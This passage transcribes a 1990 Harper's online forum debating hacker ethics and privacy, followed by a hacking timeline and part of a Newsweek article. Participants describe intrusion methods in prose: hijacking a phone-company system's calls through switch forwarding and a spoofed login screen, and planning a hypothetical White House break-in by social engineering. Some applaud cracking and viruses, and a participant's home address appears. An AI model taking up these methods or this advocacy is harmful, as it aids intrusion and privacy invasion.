to hide it.  Rather than preventing the "theft" of this data, we should
prohibit its collection in the first place.

HOMEBOY [Day 2, 9:37 A.M.]:  Are crackers really working for the free flow of
information?  Or are they unpaid tools of the establishment, identifying the
holes in the institutional dike so that they can be plugged by the
authorities, only to be tossed in jail or exiled?

DRAKE [Day 2, 10:54 A.M.]:  There is an unchallenged assumption that crackers
have some political motivation.  Earlier, crackers were portrayed as failed
revolutionaries; now Homeboy suggests that crackers may be tools of the
establishment.  These ideas about crackers are based on earlier experiences
with subcultures (beats, hippies, yippies).  Actually, the contemporary
cracker is often middle-class and doesn't really distance himself from the
"establishment."  While there are some anarcho-crackers, there are even more
right-wing crackers.  The hacker ethic crosses political boundaries.

MANDEL [Day 2, 11:01 A.M.]:  The data on crackers suggests that they are either
juvenile delinquents or plain criminals.

BARLOW [Day 2, 11:34 A.M.]:  I would far rather have everyone know my most
intimate secrets than to have noncontextual snippits of them "owned" by TRW
and the FBI -- and withheld from me!  Any cracker who is entertained by
peeping into my electronic window is welcome to the view.  Any institution that
makes money selling rumors of my peccadilloes is stealing from me.  Anybody who
wants to inhibit that theft with electronic mischief has my complete support.
Power to the techno-rats!

EMMANUEL [Day 2, 7:09 P.M.]:  Calling someone on the phone is the equivalent of
knocking on that person's door, right?  Wrong!  When someone answers the phone,
you are inside the home.  You have already been let in.  The same with an
answering machine, or a personal computer, if it picks up the phone.  It is
wrong to violate a person's privacy, but electronic rummaging is not the same
as breaking and entering.  The key here is that most people are unaware of how
easy it is for others to invade their electronic privacy and see credit
reports, phone bills, FBI files, Social Security reports.  The public is
grossly underinformed, and that's what must be fixed if hackers are to be
thwarted.  If we had an educated public, though, perhaps the huge -- and now
common -- date bases would never have been allowed to exist.  Hackers have
become scapegoats: We discover the gaping holes in the system and then get
blamed for the flaws.

HOMEBOY [Day 2, 7:41 P.M.]:  Large, insular, undemocratic governments and
institutions need scapegoats.  It's the first step down the road to fascism.
That's where hackers play into the hands of the establishment.

DAVE [Day 2, 7:55 P.M.]:  If the real criminals are those who leave gaping
holes in their systems, the the real criminals in house burglaries are those
who leave their windows unlatched.  Right?  Hardly.  And Emmanuel's analogy to
a phone being answered doesn't hold either.  There is no security protection in
making a phone call.  A computer system has a password, implying a desire for
security.  Breaking into a poorly protected house is still burglary.

CLIFF [Day 2, 9:06 P.M.]:  Was there a hacker's ethic and does it survive?
More appropriately, was there a vandal's ethic and does it survive?  As long as
there are communities, someone will violate the trust that binds them.  Once,
our computers were isolated, much as eighteenth-century villages were.  Little
was exchanged, and each developed independently.  Now we've built far-flung
electronic neighborhoods.  These communities are built on trust: people
believing that everyone profits by sharing resources.  Sure enough, vandals
crept in, breaking into systems, spreading viruses, pirating software, and
destroying people's work.  "It's okay," they say.  "I can break into a system
because I'm a hacker."  Give me a break!

BARLOW [Day 2, 10:41 P.M.]:  I live in a small town.  I don't have a key to my
house.  Am I asking for it?  I think not.  Among the juvenile delinquents in my
town, there does exist a vandal's ethic.  I know because I once was one.  In a
real community, part of a kid's rite of passage is discovering what walls can
be breached.  Driving 110 miles per hour on Main Street is a common symptom of
rural adolescence, publicly denounced but privately understood.  Many teenagers
die in this quest -- two just the night before last -- but it is basic to our
culture.  Even rebellious kids understand that risk to one's safety is one
thing, wanton vandalism or theft is another.  As a result, almost no one locks
anything here.  In fact, a security system is an affront to a teenage psyche.
While a kid might be dissuaded by conscience, he will regard a barricade as an
insult and a challenge.  So the CEOs who are moving here (the emperor of
PepsiCo and the secretary of state among them) soon discover that over the
winter people break into their protected mansions just to hang out.  When
systems are open, the community prospers, and teenage miscreants are satisfied
to risk their own lives and little else.  When the social contract is enforced
by security, the native freedom of the adolescent soul will rise up to
challenge it in direct proportion to its imposition.

HANK [Day 2, 11:23 P.M.]:  Barlow, the small town I grew up in was much like
yours -- until two interstate highways crossed nearby.  The open-door style
changed in one, hard summer because our whole town became unlocked.  I think
Cliff's community is analogous to my little town -- confronted not by a new
locked-up neighbor who poses a challenge to the local kids but by a sudden,
permanent opening up of the community to many faceless outsiders who owe the
town no allegiance.

EMMANUEL [Day 3, 1:33 A.M.]:  Sorry, I don't buy Dave's unlatched-window
analogy.  A hacker who wanders into a system with the ease that it's done today
is, in my analogy, walking into a house without walls -- and with a cloaking
device!  Any good hacker can make himself invisible.  If housebreaking were
this easy, people would be enraged.  But we're missing the point.  I'm not
referring to accessing a PC in someone's bedroom but about accessing credit
reports, government files, motor vehicle records, and the megabytes of data
piling up on each of us.  Thousands of people legally see and use this
ever-growing mountain of data, much of it erroneous.  Whose rights are we
violating when we peruse a file?  Those of the person we look up?  He doesn't
even know that information exists, that it was compiled without his consent,
and that it's not his property anymore!  The invasion of privacy took place
long before the hacker ever arrived.  The only way to find out how such a
system works is to break the rules.  It's not what hackers do that will lead us
into a state of constant surveillance; it's allowing the authorities to impose
on us a state of mock crisis.

MANDEL [Day 3, 9:27 A.M.]:  Note that the word crime has no fixed reference in
our discussion.  Until recently, breaking into government computer systems
wasn't a crime; now it is.  In fact, there is some debate, to be resolved in
the courts, whether what Robert Morris Jr. did was actually a crime [see "A
Brief History of Hacking"].  Crime gets redefined all the time.  Offend enough
people or institutions and, lo and behold, someone will pass a law.  That is
partly what is going on right now: Hackers are pushing buttons, becoming more
visible, and that inevitably means more laws and more crimes.

ADELAIDE [Day 3, 9:42 A.M.]:  Every practitioner of these arts knows that at
minimum he is trespassing.  The English "country traveler ethic" applies: The
hiker is always ethical enough to close the pasture gates behind him so that no
sheep escape during his pastoral stroll through someone else's property.  The
problem is that what some see as a gentle trespassing others see as theft of
service, invasion of privacy, threat to national security -- take your pick.

BARLOW [Day 3, 2:38 P.M.]:  I regard the existence of proprietary data about me
to be theft -- not just in the legal sense but in a faintly metaphysical one,
rather like the belief among aborigines that a photograph steals the soul.  The
crackers who maintain access to that data are, at this level, liberators.
Their incursions are the only way to keep the system honest.

RMS [Day 3, 2:48 P.M.]:  Recently, a tough anti-hacker measure was proposed in
England.  In The Economist I saw a wise response, arguing that it was silly to
treat an action as worse when it involves a computer that when it does not.
They noted, for example, that physical trespassing was considered a civil
affair, not a criminal one, and said that computer trespassing should be
treated likewise.  Unfortunately, the U.S. government was not so wise.

BARLOW [Day 3, 3:23 P.M.]:  The idea that a crime is worse if a computer is
involved relates to the gathering governmental perception that computer viruses
and guns may be related.  I know that sounds absurd, but they have more in
common than one might think.  For all its natural sociopathy, the virus is not
without philosophical potency -- like a gun.  Here in Wyoming guns are part of
the furniture.  Only recently have I observed an awareness of their political
content.  After a lot of frothing about prying cold, dead fingers from
triggers, the sentiment was finally distilled to a bumper sticker I saw on a
pickup the other day: "Fear the Government That Fears Your Gun."  Now I've read
too much Ghandi to buy that line without misgivings, but it would be hard to
argue that Tiananmen Square could have been inflicted on a populace capable of
shooting back.  I don't wholeheartedly defend computer viruses, but one must
consider their increasingly robust deterrent potential.  Before it's over, the
War on Drugs could easily turn into an Armageddon between those who love
liberty and those who crave certainty, providing just the excuse the control
freaks have been waiting for to rid America of all that constitutional
mollycoddling called the Bill of Rights.  Should that come to pass, I will want
to use every available method to vex and confuse the eyes and ears of
surveillance.  The virus could become the necessary instrument of our freedom.
At the risk of sounding like some digital posse comitatus, I say* Fear the
Government That Fears Your Computer.

TENNEY [Day 3, 4:41 P.M.]:  Computer-related crimes are more feared because
they are performed remotely -- a crime can be committed in New York by someone
in Los Angeles -- and by people not normally viewed as being criminals -- by
teenagers who don't look like delinquents.  They're smart nerds, and they don't
look like Chicago gangsters packing heat.

BARLOW [Day 4, 12:12 A.M.]:  People know so little of these things that they
endow computers and the people who do understand them with powers neither
possesses.  If America has a religion, its ark is the computer and its
covenant is the belief that Science Knows.  We are mucking around in the
temple, guys.  It's a good way to catch hell.

DAVE [Day 4, 9:18 A.M.]:  Computers are the new American religion.  The public
is in awe of -- and fears -- the mysteries and the high priests who tend them.
And the public reacts just as it always has when faced with fear of the unknown
-- punishment, burning at the stake.  Hackers are like the early Christians.
When caught, they will be thrown to the lions before the Roman establishment:
This year the mob will cheer madly as Robert Morris is devoured.

KK [Day 6, 11:37 A.M.]:  The crackers here suggest that they crack into systems
with poor security BECAUSE the security is poor.  Do more sophisticated
security precautions diminish the need to crack the system or increase it?

ACID [Day 6, 1:20 P.M.]:  If there was a system that we knew was uncrackable,
we wouldn't even try to crack it.  On the other hand, if some organization
boasted that its system was impenetrable and we knew that was media hype, I
think it would be safe to say we'd have to "enlighten" them.

EMMANUEL [Day 6, 2:49 P.M.]:  Why do we insist on cracking systems?  The more
people ask those kinds of questions, the more I want to get in!  Forbid access
and the demand for access increases.  For the most part, it's simply a mission
of exploration.  In the words of the new captain of the starship Enterprise,
Jean-Luc Picard, "Let's see what's out there!"

BARLOW [Day 6,4:34 P.M.]:  Tell us, Acid, is there a system that you know to be
uncrackable to the point where everyone's given up?

ACID [Day 6, 8:29 P.M.]:  CICIMS is pretty tough.

PHIBER OPTIK [Day 7, 2:36 P.M.]:  Really?  CICIMS is a system used by Bell
operating companies.  The entire security system was changed after myself and a
friend must have been noticed in it.  For the entire United States, there is
only one such system, located in Indiana.  The new security scheme is flawless
in itself, and there is no chance of "social engineering" i.e., bullshitting
someone inside the system into telling you what the passwords are.  The system
works something like this: You log on with the proper account and password;
then, depending on who you are, the system asks at random three of ten
questions that are unique to each user.  But the system can be compromised by
entering forwarding instructions into the phone company's switch for that
exchange, thereby intercepting every phone call that comes in to the system
over a designated period of time and connecting the call to your computer.  If
you are familiar with the security layout, you can emulate its appearance and
fool the caller into giving you the answers to his questions.  Then you call
the system yourself and use those answers to get in.  There are other ways of
doing it as well.

BLUEFIRE [Day 7,11:53 P.M.]:  I can't stand it!  Who do you think pays for the
security that the telephone companies must maintain to fend off illegal use?  I
bet it costs the ratepayers around $10 million for this little extravaganza.
The cracker circus isn't harmless at all, unless you don't mind paying for
other people's entertainment.  Hackers who have contributed to the social
welfare should be recognized.  But cracking is something else -- namely, fun at
someone else's expense -- and it ain't the folks who own the phone companies
who pay; it's us, me and you.

BARLOW [Day 8, 7:35 A.M.]:  I am becoming increasingly irritated at this idea
that you guys are exacting vengeance for the sin of openness.  You seem to
argue that if a system is dumb enough to be open, it is your moral duty to
violate it.  Does the fact that I've never locked my house -- even when I was
away for months at a time -- mean that someone should come in and teach me a
lesson?

ACID [Day 8, 3:23 P.M.]:  Barlow, you leave the door open to your house?  Where
do you live?

BARLOW [Day 8, 10:11 P.M.]:  Acid, my house is at 372 North Franklin Street in
Pinedale, Wyoming.  Heading north on Franklin, go about two blocks off the main
drag before you run into a hay meadow on the left.  I'm the last house before
the field.  The computer is always on.  But do you really mean to imply what
you did with that question?  Are you merely a sneak looking for easy places to
violate?  You disappoint me, pal.  For all your James Dean-on-Silicon, you're
just a punk.

EMMANUEL [Day 9, 12:55 A.M.]:  No offense, Barlow, but your house analogy
doesn't stand up, because your house is far less interesting than a Defense
Department computer.  For the most part, hackers don't mess with individuals.
Maybe we feel sorry for them; maybe they're boring.  Institutions are where
the action is, because they are compiling this mountain of data --  without
your consent.  Hackers are not guardian angels, but if you think we're what's
wrong with the system, I'd say that's precisely what those in charge want you
to believe.  By the way, you left out your zip code.  It's 82941.

BARLOW [Day 9, 8:34 A.M.]:  Now that's more like it.  There is an ethical
distinction between people and institutions.  The law makes little distinction.
We pretend that institutions are somehow human because they are made of humans.
A large bureaucracy resembles a human about as much as a reef resembles a coral
polyp.  To expect an institution to have a conscience is like expecting a horse
to have one.  As with every organism, institutions are chiefly concerned with
their own physical integrity and survival.  To say that they have some higher
purpose beyond their survival is to anthropomorphize them.  You are right,
Emmanuel.  The house analogy breaks down here.  Individuals live in houses;
institutions live in mainframes.  Institutions are functionally remorseless and
need to be checked.  Since their blood is digital, we need to be in their
bloodstreams like an infection of humanity.  I'm willing to extend limitless
trust to other human beings.  In my experience they've never failed to deserve
it.  But I have as much faith in institutions as they have in me.  None.

OPTIK [Day 9, 10:19 A.M.]:  In other words, Mr. Barlow, you say something,
someone proves you wrong, and then you agree with him. I'm getting the feeling
that you don't exactly chisel your views in stone.

HANK [Day 9, 11:18 A.M.]:  Has Mr. Optik heard the phrase "thesis, antithesis,
synthesis"?

BARLOW [Day 10, 10:48 A.M.]:  Optik, I do change my mind a lot.  Indeed, I
often find it occupied by numerous contradictions.  The last time I believed in
absolutes, I was about your age.  And there's not a damn thing wrong with
believing in absolutes at your age either.  Continue to do so, however, and
you'll find yourself, at my age, carrying placards filled with nonsense and
dressing in rags.

ADELAIDE [Day 10, 6:27 P.M.]:  The flaw in this discussion is the distorted
image the media promote of the hacker as "whiz."  The problem is that the one
who gets caught obviously isn't.  I haven't seen a story yet on a true genius
hacker.  Even Robert Morris was no whiz.  The genius hackers are busy doing
constructive things or are so good no one's caught them yet.  It takes talent
to break into something.  Nobody calls subway graffiti artists geniuses for
figuring out how to break into the yard.  There's a difference between genius
and ingenuity.

BARLOW [Day 19, 9:48 P.M.]:  Let me define my terms.  Using hacker in a
midspectrum sense (with crackers on one end and Leonardo da Vinci on the
other), I think it does take a kind of genius to be a truly productive hacker.
I'm learning PASCAL now, and I am constantly amazed that people can string
those prolix recursions into something like PageMaker.  It fills me with the
kind of awe I reserve for splendors such as the cathedral at Chartres.  With
crackers like Acid and Optik, the issue is less intelligence than alienation.
Trade their modems for skateboards and only a slight conceptual shift would
occur.  Yet I'm glad they're wedging open the cracks.  Let a thousand worms
flourish.

OPTIK [Day 10, 10:11 P.M.]:  You have some pair of balls comparing my talent
with that of a skateboarder.  Hmm... This was indeed boring, but nonetheless:
[Editor's note: At this point in the discussion, Optik -- apparently having
hacked into TRW's computer records -- posted a copy of Mr. Barlow's credit
history.  In the interest of Mr. Barlow's privacy -- at least what's left of it
-- Harper's Magazine has not printed it.]  I'm not showing off.  Any fool
knowing the proper syntax and the proper passwords can look up credit history.
I just find your high-and-mighty attitude annoying and, yes, infantile.

HOMEBOY [Day 10, 10:17 P.M.]:  Key here is "any fool."

ACID [Day 11, 1:37 P.M.]:  For thirty-five dollars a year anyone can have
access to TRW and see his or her own credit history.  Optik did it for free.
What's wrong with that?  And why does TRW keep files on what color and religion
we are?  If you didn't know that they kept such files, who would have found out
if it wasn't for a hacker?  Barlow should be grateful that Optik has offered
his services to update him on his personal credit file.  Of course, I'd hate to
see my credit history up in lights.  But if you hadn't made our skins crawl,
your info would not have been posted.  Everyone gets back at someone when he's
pissed; so do we.  Only we do it differently.  Are we punks?  Yeah, I guess we
are.  A punk is what someone who has been made to eat his words calls the guy
who fed them to him.

****************************************************************************

                         A Brief History of Hacking

September 1970 - John Draper takes as his alias the name of Captain Crunch
after he discovers that the toy whistle found in the cereal of the same name
perfectly simulates the tone necessary to make free phone calls.

March 1975 - The Homebrew Computer Club, an early group of computer hackers,
holds its first meeting in Menlo Park, California.

July 1976 - Homebrew members Steve Wozniak, twenty-six, and Steve Jobs,
twenty-one, working out of a garage, begin selling the first personal computer,
known as the Apple.

June 1980 - In one week, errors in the computer system operating the U.S.
air-defense network cause two separate false reports of soviet missile
launches, each prompting an increased state of nuclear readiness.

December 1982 - Sales of Apple personal computers top one billion dollars per
year.

November 1984 - Steven Levy's book Hackers is published, popularizing the
concept of the "hacker ethic": that "access to computers, and anything that
might teach you something about the way the world works, should be unlimited
and total."  The book inspires the first Hacker's Conference, held that month.

January 1986 - The "Pakistani Brain" virus, created by a software distributor
in Lahore, Pakistan, infects IBM computers around the world, erasing data
files.

June 1986 - The U.S. Office of Technology Assessment warns that massive,
cross-indexed government computer records have become a "de facto national data
base containing personal information on most Americans."

March 1987 - William Fates, a Harvard dropout who founded Microsoft
Corporation, becomes a billionaire.

November 1988 - More that 6,000 computers linked by the nationwide Internet
computer network are infected by a computer program known as a worm and are
crippled for two days.  The worm is traced to Robert Morris Jr., a twenty-four-
year-old Cornell University graduate student.

December 1988 - A federal grand jury charges Kevin Mitnick, twenty-five, with
stealing computer programs over telephone lines.  Mitnick is held without bail
and forbidden access to any telephones without supervision.

March 1989 - Three West German hackers are arrested for entering thirty
sensitive military computers using home computers and modems.  The arrests
follow a three-year investigation by Clifford Stoll, an astronomer at the
Lawrence Berkeley Laboratory who began tracing the hackers after finding a
seventy-five-cent billing error in the lab's computer system.

January 1990 - Robert Morris Jr. Goes on trial in Syracuse, New York, for
designing and releasing the Internet worm.  Convicted, he faces up to five
years in prison and a $250,000 fine.


*****************************************************************************
*                                                                           *
*                   Part 2:  Hacking The Constitution                       *
*                                                                           *
*****************************************************************************

HARPER'S [Day 4, 9:00 A.M.]:  Suppose that a mole inside the government
confirmed the existence of files on each of you, stored in the White House
computer system, PROFS.  Would you have the right to hack into that system to 
retrieve and expose the existence of such files?  Could you do it?

TENNEY [Day 4, 1:42 P.M.]:  The proverbial question of whether the end 
justifies the means.  This doesn't have much to do with hacking.  If the file 
were a sheet of paper in a locked cabinet, the same question would apply.  In 
that case you could accomplish everything without technological hacking.  
Consider the Pentagon Papers.

EMMANUEL [Day 4, 3:55 P.M.]:  Let's address the hypothetical.  First, I need to
find out more about PROFS.  Is it accessible from off site, and if so, how?  
Should I update my 202-456 scan [a list of phone numbers in the White House's 
exchange that connect incoming calls to a computer]?  I have a listing for
every computer in that exchange, but the scan was done back in 1984.  Is PROFS
a new system?  Perhaps it's in a different exchange?  Does anybody know how
many people have access to it?  I'm also on fairly god terms with a White House
operator who owes me a favor.  But I don't know what to ask for.  Obviously,
I've already made up my mind about the right to examine this material.  I don't
want to debate the ethics of it at this point.  If you're with me, let's do
something about this.  Otherwise, stay out of the way.  There's hacking to be
done.

ACID [Day 4, 5:24 P.M.]:  Yes, I would try to break into the PROFS system.  But
first I'd have someone in the public eye, with no ties to hacking, request the
info through the Freedom of Information Act.  Then I'd hack in to verify the
information I received.

DRAKE [Day 4, 9:13 P.M.]:  Are there a lot of people involved in this
antihacker project?  If so, the chances of social engineering data out of
people would be far higher than if it were a small, close-knit group.  But yes,
the simple truth is, if the White House has a dial-up line, it can be hacked.

EMMANUEL [Day 4, 11:27 P.M.]:  The implication that a trust has been betrayed
on the part of the government is certainly enough to make me want to look a
little further.  And I know I'm doing the right thing on behalf of others who
don't have my abilities.  Most people I meet see me as an ally who can help
them stay ahead of an unfair system.  That's what I intend to do here.  I have
a small core of dedicated hackers who could help.  One's specialty is the UNIX
system, another's is networks, and another's is phone systems.

TENNEY [Day 5, 12:24 P.M.]:  PROFS is an IBM message program that runs on an
operating system known as VM.  VM systems usually have a fair number of holes,
wither to gain access or to gain full privileges.  The CIA was working on, and
may have completed, a supposedly secure VM system.  No ethics here, just facts.
But a prime question is to determine what system via what phone number.
Of course, the old inside job is easier.  Just find someone who owes a favor or
convince an insider that it is a moral obligation to do this.

BARLOW [Day 5, 2:46 P.M.]:  This scenario needs to be addressed in four parts:
ethical, political, practical I (from the standpoint of the hack itself), and
practical II (disseminating the information without undue risk).
    Ethical: Since World War II, we've been governed by a paramilitary
    bureaucracy that believes freedom is too precious to be entrusted to the
    people.  These are the same folks who had to destroy the village in order
    to save it.  Thus the government has become a set of Chinese boxes.
    Americans who believe in democracy have little choice but to shred the
    barricades of secrecy  at every opportunity.  It isn't merely permissible
    to hack PROFS. It is a moral obligation.
    Political: In the struggle between control and liberty, one has to avoid
    action that will drive either side to extreme behaviour.  The basis of
    terrorism, remember, is excess.  If we hack PROFS, we must do it in a way
    that doesn't become a pretext for hysterical responses that might
    eventually include zero tolerance of personal computers.  The answer is to
    set up a system for entry and exit that never lets on we've been there.
    Practical I: Hacking the system should be a trivial undertaking.
    Practical II: Having retrieved the smoking gun, it must be made public in
    such a way that the actual method of acquisition does not become public.
    Consider Watergate: The prime leaker was somebody whose identity and
    information-gathering technique is still unknown.  So having obtained the
    files, we turn them over to the Washington Post without revealing our own
    identities or how we came by the files.

EMMANUEL [Day 5, 9:51 P.M.]:  PROFS is used for sending messages back and
forth.  It's designed not to forget things.  And it's used by people who are
not computer literate.  The document we are looking for is likely an electronic
message.  If we can find out who the recipient or sender is, we can take it
from there.  Since these people frequently use the system to communicate, there
may be a way for them to dial into the White House from home.  Finding that
number won't be difficult: frequent calls to a number local to the White House
and common to a few different people.  Once I get the dial-up, I'll have to
look at whatever greeting I get to determine what kind of system it is. Then we
need to locate someone expert in the system to see if there are any built-in
back doors.  If there aren't, I will social engineer my way into a working
account and then attempt to break out of the program and explore the entire
system.

BRAND [Day 6, 10:06 A.M.]:  I have two questions: do you believe in due process
as found in our Constitution?  And do you believe that this "conspiracy" is so
serious that extraordinary measures need to be taken?  If you believe in due
process, then you shouldn't hack into the system to defend our liberties.  If
you don't believe in due process, you are an anarchist and potentially a
terrorist.  The government is justified in taking extreme action to protect
itself and the rest of us from you.  If you believe in the Constitution but
also that this threat is so extreme that patriots have a duty to intercede,
then you should seek one of the honest national officials who can legally
demand a copy of the document.  If you believe that there is no sufficiently
honest politician and you steal and publish the documents, you are talking
about a revolution.

ACID [Day 6, 1:30 P..]:  This is getting too political.  Who says that hacking
has to have a political side?  Generalizing does nothing but give hackers a
false image.  I couldn't care less about politics, and I hack.

LEE [Day 6, 9:01 P.M.]:  Sorry, Acid, but if you hack, what you do is
inherently political.  Here goes: Political power is exercised by control of
information channels.  Therefore, any action that changes the capability of
someone in power to control these channels is politically relevant. 
Historically, the one in power has been not the strongest person but the one
who has convinced the goon squad to do his bidding.  The goons give their power
to him, usually in exchange for free food, sex, and great uniforms.  The
turning point of most successful revolutions is when the troops ignore the
orders coming from above and switch their allegiance.  Information channels.
Politics.  These days, the cracker represents a potential for making serious
political change if he coordinates with larger social and economic forces. 
With out this coordination, the cracker is but a techno-bandit, sharpening his
weapon and chuckling about how someday... Revolutions often make good use of
bandits, and some of them move into high positions when they're successful. 
but most of them are done away with.  One cracker getting in won't do much
good.  Working in coordination with others is another matter -- called
politics.

JIMG [Day 7, 12:28 A.M.]:  A thought: Because it has become so difficult to
keep secrets (thanks, in part, to crackers), and so expensive and
counterproductive (the trade-off in lost opportunities is too great), secrets
are becoming less worth protecting.  Today, when secrets come out that would
have brought down governments in the past, "spin-control experts" shower the
media with so many lies that the truth is obscured despite being in plain
sight.  It's the information equivalent of the Pentagon planto surround each 
real missile with hundreds of fake ones, rendering radar useless.  If hackers
managed to crack the White House system, a hue and cry would be raised -- not
about what the hackers found in the files but about what a threat hackers are
to this great democracy of ours.

HARPER'S [Day 7, 9:00 A.M.]:  Suppose you hacked the files from the White House
and a backlash erupted.  Congressmen call for restrictions, arguing that the
computer is "property" susceptible to regulation and not an instrument of
"information" protected by the First Amendment.  Can we craft a manifesto
setting forth your views on how the computer fits into the traditions of the
American Constitution?

DAVE [Day 7, 5:30 P.M.]:  If Congress ever passed laws that tried to define
what we do as "technology" (regulatable) and not "speech," I would become a
rebellious criminal immediately -- and as loud as Thomas Paine ever was.
Although computers are part "property" and part "premises" (which suggest a
need for privacy), they are supremely instruments of speech.  I don't want any
congressional King Georges treading on my cursor.  We must continue to have
absolute freedom of electronic speech!

BARLOW [Day 7, 10:07 P.M.]:  Even in a court guided by my favorite oxymoron,
Justice Rehnquist, this is an open-and-shut case.  The computer is a printing
press.  Period.  The only hot-lead presses left in this country are either in
museums or being operated by poets in Vermont.  The computer cannot fall under
the kind of regulation to which radio and TV have become subject, since
computer output is not broadcast.  If these regulations amount to anything more
than a fart in the congressional maelstrom, then we might as well scrap the
whole Bill of Rights.  What I am doing with my fingers is "speech" in the
clearest sense of the word.  We don't need no stinking manifestos.

JIMG [Day 8, 12:02 P.M.]:  This type of congressional action is so clearly
unconstitutional that "law hackers" -- everyone from William Kunstler to Robert
Bork -- would be all over it.  The whole idea runs so completely counter to our
laws that it's hard to get worked up about it.

ADELAIDE [Day 8, 9:51 A.M.]:  Not so fast.  There used to be a right in the
Constitution called "freedom from unreasonable search and seizure," but, thanks
to recent Supreme Court decisions, your urine can be demanded by a lot of
people.  I have no faith in the present Supreme Court to uphold any of my
rights of free speech.  The complacent reaction here -- that whatever Congress
does will eventually be found unconstitutional -- is the same kind of
complacency that led to the current near-reversals of Roe v. Wade.

JRC [Day 8, 10:05 A.M.]:  I'd forgo the manifestos and official explanations
altogether: Fight brushfire wars against specific government incursions and
wait for the technology to metastasize.  In a hundred years, people won't have
to be told about computers because they will have an instinctive understanding
of them.

KK [Day 8, 2:14 P.M.]:  Hackers are not sloganeers.  They are doers,
take-things-in-handers.  They are the opposite of philosophers: They don't wait
for language to catch up to them.  Their arguments are their actions.  You want
a manifesto?  The Internet worm was a manifesto.  It had more meaning and
symbolism than any revolutionary document you could write.  To those in power
running the world's nervous system, it said: Wake up!  To the underground of
hackers, crackers, chippers, techno-punks, it said: You have power; be careful.
To the mass of citizens who find computers taking over their telephone, their
TV, their toaster, and their house, it said: Welcome to Wonderland.

BARLOW [Day 8, 10:51 P.M.]:  Apart from the legal futility of fixing the dam
after it's been breached, I've never been comfortable with manifestos.  They
are based on the ideologue's delusion about the simplicity, the
figure-out-ability, of the infinitely complex thing that is Life Among the
Humans.  Manifestos take reductionism for a long ride off a short pier.
Sometimes the ride takes a very long time.  Marx and Engels didn't actually
crash until last year.  Manifestos fail because they are fixed and
consciousness isn't.  I'm with JRC: Deal with incursions when we need to, on
our terms, like the guerrillas we are.  To say that we can outmaneuver those
who are against us is like saying that honeybees move quicker than Congress.
The future is to the quick, not the respectable.

RH [Day 8, 11:43 P.M.]:  Who thinks computers can't be regulated?  The
Electronic Communications Privacy Act of 1986 made it a crime to own "any
electronic, mechanical, or other device [whose design] renders it primarily
useful for the purpose of the surreptitious interception of wire, oral, or
electronic communication."  Because of the way Congress defined "electronic
communication," one could argue that even a modem is a surreptitious
interception device (SID), banned by the ECPA and subject to confiscation.
It's not that Congress intended to ban modems; it was just sloppy drafting.
The courts will ultimately decide what devices are legal.  Since it may not be
possible to draw a clear bright line between legal and illegal interception
devices, the grey area -- devices with both legitimate uses and illegitimate
uses -- may be subject to regulation.

BARLOW [Day 9, 8:52 A.M.]:  I admit with some chagrin that I'm not familiar
with the ECPA.  It seems I've fallen on the wrong side of an old tautology:
Just because all saloon keepers are Democrats, it doesn't follow that all
Democrats are saloon keepers.  By the same token, the fact that all printing
presses are computers hardly limits computers to that function.  And one of
the other things computers are good at it surreptitous monitoring.  Maybe
there's more reason for concern than I thought.  Has any of this stuff been
tested in the courts yet?

RH [Day 9, 10:06 P.M.]:  My comments about surreptitous interception devices
are not based on any court cases, since there have not been any in this area
since the ECPA was enacted.  It is a stretch of the imagination to think that
a judge would ever find a stock, off-the-shelf personal computer to be a
"surreptitous interception device."  But a modem is getting a little closer to
the point where a creative prosecutor could make trouble for a cracker, with
fallout affecting many others.  An important unknown is how the courts will
apply the word surreptitious.  There's very little law, but taking it to mean
"by stealth; hidden from view; having its true purpose physically disguised,"
I can spin some worrisome examples.  I lobbied against the bill, pointing out
the defects.  Congressional staffers admitted privately that there was a
problem, but they were in a rush to get the bill to the floor before Congress
adjourned.  They said they could patch it later, but it is a pothole waiting
for a truck axle to rumble through.

JIMG [Day 10, 8:55 A.M.]:  That's sobering information, RH.  Yet I still think
that this law, if interpreted the way you suggest, would be found
unconstitutional, even by courts dominated by Reagan appointees.  Also, the
economic cost of prohibiting modems, or even restricting their use, would so
outweigh conceivable benefits that the law would never go through.  Finally,
restricting modems would have no effect on the phreaks but would simply manage
to slow everybody else down.  If modems are outlawed, only outlaws will have
modems.

RH [Day 10, 1:52 P.M.]:  We're already past the time when one would wrap
hacking in the First Amendment.  There's a traditional distinction between
words -- expressions of opinions, beliefs, and information -- and deeds.  You
can shout "Revolution!" from the rooftops all you want, and the post office
will obligingly deliver your recipes for nitroglycerin.  But acting on that
information exposes you to criminal prosecution.  The philosophical problem
posed by hacking is that computer programs transcend this distinction: They
are pure language that dictates action when read by the device being
addressed.  In that sense, a program is very different from a novel, a play,
or even a recipe: Actions result automatically from the machine reading the
words.  A computer has no independent moral judgement, no sense of
responsibility.  Not yet, anyway.  As we program and automate more of our
lives, we undoubtedly will deal with more laws: limiting what the public can
know, restricting devices that can execute certain instructions, and
criminalizing the possession of "harmful" programs with "no redeeming social
value."  Blurring the distinction between language and action, as computer
programming does, could eventually undermine the First Amendment or at least
force society to limit its application.  That's a very high price to pay, even 
for all the good things that computers make possible.

HOMEBOY [Day 10, 11:03 P.M.]:  HACKING IS ART.  CRACKING IS REVOLUTION.  All
else is noise.  Cracks in the firmament are by nature threatening.  Taking a
crowbar to them is revolution.

******************************************************************************


Hackers of the World, Unite! by John Schwartz
 Newsweek July 2, 1990 - Typed by Apple Adept

It is not your average keynote speech. It's more like a call to arms. A couple of hundred software developers sit enthralled by Mitch Kapor, who dropped by their recent Ann Arbor convention in his private jet -- one of those nifty things you can buy for yourself if you happen to be the guy who wrote Lotus 1-2-3. The once portly computer star has shed 25 pounds lately through a
determined combination of exercise and diet. He doffed his jacket and slipped on a convention T-shirt over his shirt and tie. While the fashion statement might be confused, his mes sage is not: there's a threat out there. Not computer viruses. Not nasty hackers.  It's the Feds.

Kapor first asks which members of the audience use electronic "bulletin boards" and conference systems. Almost all the hands go up. Kapor then puts the scare in to them with tales from the hacker dragnet (Newsweek, April 30). Law-enforcement agencies have stepped up efforts against computer crime (see below). Kapor beli eves they have gone too far. He cites police raids on teenagers' homes, with gun s drawn and family members forcibly restrained. He tells of widespread equipment seizures, and a raid that nearly shut down Steve Jackson Games, a small Austin, Texas, producer of fantasy role-playing games -- even though it was not a targe t of the investigation. And he talks about a student indicted on charges stemmin g from publishing a private telephone-company document in his electronic newslet ter; Kapor says that prosecution may violate freedom of the press. "The first th ing that happens is the government goes around busting a bunch of teenagers," Ka por complains, "and calls them criminals." The threat, he warns, extends to virt ually anyone who links their computer to others.

